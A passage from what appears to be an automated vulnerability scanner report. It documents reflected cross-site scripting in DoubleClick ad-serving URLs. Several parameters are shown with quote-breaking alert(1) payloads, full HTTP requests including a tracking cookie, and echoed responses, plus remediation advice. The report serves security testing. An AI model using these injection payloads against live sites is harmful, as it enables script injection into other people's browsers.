document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b71b2'-alert(1)-'c477c344b94 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c9f"-alert(1)-"2dc82fe9c33 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8cd'-alert(1)-'b5744e625cb was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc7"-alert(1)-"0a30ccb0824 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3026'-alert(1)-'e11fbbb3a32 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82cb"-alert(1)-"4da37f8e4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:03:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a96'-alert(1)-'d3284128866 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... nk\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d0bc'-alert(1)-'4aa45ed95d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:03 GMT
Expires: Thu, 03 Feb 2011 16:09:03 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4https://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b43"-alert(1)-"4b5b2d05a2f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:02 GMT
Expires: Thu, 03 Feb 2011 16:09:02 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2fhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6f88'-alert(1)-'5d816f81708 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close
